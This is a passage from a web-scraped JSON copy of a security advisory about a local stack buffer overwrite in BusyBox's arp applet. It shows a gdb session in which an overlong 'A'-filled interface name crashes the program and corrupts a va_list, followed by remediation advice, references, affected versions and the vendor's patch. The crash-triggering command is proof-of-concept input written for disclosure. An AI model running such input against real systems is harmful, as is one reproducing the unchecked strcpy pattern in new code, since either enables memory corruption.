crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> \tgdb &#8211;args .\/busybox_unstripped arp  -Ds 1.1.1.1 $(python -c &#8220;print &#8216;A&#8217;*(64+40+40)&#8221;)  \t(gdb) ioctl_or_perror_and_die  \tUndefined command: &#8220;ioctl_or_perror_and_die&#8221;.  Try &#8220;help&#8221;.  \t(gdb) b ioctl_or_perror_and_die  \tBreakpoint 1 at 0x80f1851: file libbb\/xfuncs_printf.c, line 501.  \t(gdb) r  \tStarting program: \/src\/busybox-dhcp\/busybox_unstripped arp -Ds 1.1.1.1 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA  \t  \tBreakpoint 1, ioctl_or_perror_and_die (fd=3, request=35111, argp=0xbffff514, fmt=0x820cc85 &#8220;can&#8217;t get HW-Address for &#8216;%s'&#8221;)  \t    at libbb\/xfuncs_printf.c:501  \t501     {  \t(gdb) s  \t505             ret = ioctl(fd, request, argp);  \t(gdb) s  \t506             if (ret &lt; 0) {  \t(gdb) s  \t507                     va_start(p, fmt);  \t(gdb) s  \t508                     bb_verror_msg(fmt, p, strerror(errno));  \t(gdb) x\/10s p  \t0xbffff510:      &#8216;A&#8217; &lt;repeats 148 times&gt;\t\t\t\t\t\t\t\t\t\t\t\t\t\/** !! INVALID va_list struct, missing header*\/  \t0xbffff5a5:      &#8220;271\u000004b&#8221;  \t0xbffff5a9:      &#8220;231357pU?\u000021b\u000030367377277177315 b314365377277314365377277320365377277320365377277\u00c8$b&#8221;  \t0xbffff5cd:      &#8220;231357p330366377277&#8221;  \t0xbffff5d5:      &#8220;\u000003&#8221;  \t0xbffff5d7:      &#8220;&#8221;  \t0xbffff5d8:      &#8220;&#8221;  \t0xbffff5d9:      &#8220;&#8221;  \t0xbffff5da:      &#8220;&#8221;  \t0xbffff5db:      &#8220;&#8221;  \t(gdb)<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288fa0148121245-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288fa0148121245-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288fa0148121245-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288fa0148121245-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288fa0148121245-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288fa0148121245-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288fa0148121245-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288fa0148121245-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288fa0148121245-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288fa0148121245-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288fa0148121245-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288fa0148121245-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288fa0148121245-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288fa0148121245-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288fa0148121245-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288fa0148121245-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288fa0148121245-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288fa0148121245-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288fa0148121245-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288fa0148121245-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288fa0148121245-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288fa0148121245-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288fa0148121245-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288fa0148121245-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288fa0148121245-25\">25<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288fa0148121245-26\">26<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288fa0148121245-27\">27<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288fa0148121245-28\">28<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288fa0148121245-29\">29<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288fa0148121245-30\">30<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288fa0148121245-31\">31<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58867ec288fa0148121245-1\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">gdb<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-i\">args<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-e\">busybox_unstripped <\/span><span class=\"crayon-v\">arp<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">Ds<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1.1.1.1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">python<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">c<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;print &#8216;A&#8217;*(64+40+40)&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288fa0148121245-2\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">gdb<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ioctl_or_perror_and_die<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288fa0148121245-3\"><span class=\"crayon-e\">\t<\/span><span class=\"crayon-e\">Undefined <\/span><span class=\"crayon-v\">command<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;ioctl_or_perror_and_die&#8221;<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-st\">Try<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;help&#8221;<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288fa0148121245-4\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">gdb<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">b<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ioctl_or_perror_and_die<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288fa0148121245-5\"><span class=\"crayon-e\">\t<\/span><span class=\"crayon-i\">Breakpoint<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">at<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x80f1851<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">file <\/span><span class=\"crayon-v\">libbb<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">xfuncs_printf<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">c<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">line<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">501.<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288fa0148121245-6\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">gdb<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">r<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288fa0148121245-7\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">Starting <\/span><span class=\"crayon-v\">program<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">src<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">busybox<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">dhcp<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-e\">busybox_unstripped <\/span><span class=\"crayon-v\">arp<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">Ds<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1.1.1.1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288fa0148121245-8\"><span class=\"crayon-e\">\t<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288fa0148121245-9\"><span class=\"crayon-e\">\t<\/span><span class=\"crayon-i\">Breakpoint<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ioctl_or_perror_and_die<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">fd<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">3<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">request<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">35111<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">argp<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0xbffff514<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">fmt<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0x820cc85<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;can&#8217;t get HW-Address for &#8216;%s'&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288fa0148121245-10\"><span class=\"crayon-h\">\t&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">at <\/span><span class=\"crayon-v\">libbb<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">xfuncs_printf<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">c<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">501<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288fa0148121245-11\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">501<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288fa0148121245-12\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">gdb<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">s<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288fa0148121245-13\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">505<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">ret<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ioctl<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">fd<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">request<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">argp<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288fa0148121245-14\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">gdb<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">s<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288fa0148121245-15\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">506<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">ret<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288fa0148121245-16\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">gdb<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">s<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288fa0148121245-17\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">507<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-e\">va_start<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">fmt<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288fa0148121245-18\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">gdb<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">s<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288fa0148121245-19\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">508<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-e\">bb_verror_msg<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">fmt<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">strerror<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">errno<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288fa0148121245-20\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">gdb<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">x<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">10s<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">p<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288fa0148121245-21\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0xbffff510<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8216;A&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-i\">repeats<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">148<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">times<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\">\t\t\t\t\t\t\t\t\t\t\t\t\t<\/span><span class=\"crayon-c\">\/** !! INVALID va_list struct, missing header*\/<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288fa0148121245-22\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0xbffff5a5<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;271\u000004b&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288fa0148121245-23\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0xbffff5a9<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;231357pU?\u000021b\u000030367377277177315 b314365377277314365377277320365377277320365377277\u00c8$b&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288fa0148121245-24\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0xbffff5cd<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;231357p330366377277&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288fa0148121245-25\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0xbffff5d5<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;\u000003&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288fa0148121245-26\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0xbffff5d7<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288fa0148121245-27\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0xbffff5d8<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288fa0148121245-28\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0xbffff5d9<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288fa0148121245-29\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0xbffff5da<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288fa0148121245-30\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0xbffff5db<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288fa0148121245-31\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">gdb<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0081 seconds] -->  <\/p>\n<p>see inline comment: <code>va_list<\/code> is messed up.<\/p>\n<p><strong>Remediation Steps<\/strong><br \/> <code>strcpy<\/code> => <code>strncpy(dst,src,n=sizeof(ifreq.ifr_name)-1)<\/code> or less error prone but more overhead <code>snprintf()<\/code><\/p>\n<p><strong>References<\/strong><br \/> [1] http:\/\/busybox.net<br \/> [2] http:\/\/busybox.net\/downloads\/?C=M;O=A<br \/> [3] http:\/\/git.busybox.net\/busybox\/commit\/networking\/arp.c?id=88e2b1cb626761b1924305b761a5dfc723613c4e<br \/> [4] https:\/\/en.wikipedia.org\/wiki\/BusyBox<br \/> [5] http:\/\/lxr.free-electrons.com\/source\/include\/uapi\/linux\/if.h#L203<br \/> [6] http:\/\/lxr.free-electrons.com\/source\/include\/uapi\/linux\/if.h#L26<\/p>\n<p><strong>Vulnerable Versions<\/strong><br \/> BusyBox version 1.23.1<br \/> BusyBox version after 1.4.0<\/p>\n<p><strong>Immune Versions<\/strong><br \/> BusyBox  version prior to 1.4.0<\/p>\n<p><strong>Vendor response<\/strong><br \/> The vendor has released a <a href=\"https:\/\/bugs.busybox.net\/show_bug.cgi?id=9071\">patch<\/a> to address the vulnerability <\/p>\n<\/p><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/2725\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Vulnerability Description BusyBox provides an arp applet which is missing an array bounds check for command-line parameter IFNAME. It is therefore vulnerable to a command-line based local stack buffer overwrite effectively allowing local users to write past a 16 bytes fixed stack buffer. This leads to two scenarios, one (A) where an IOCTL for GET_HW_ADDRESS &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/2725\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory &#8211; BusyBox (local) cmdline stack buffer overwrite<\/span> <span class=\"meta-nav\">&#8594;<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[10757],"class_list":["post-6277","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-securiteam-secure-disclosure"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/6277","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=6277"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/6277\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=6277"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=6277"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=6277"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}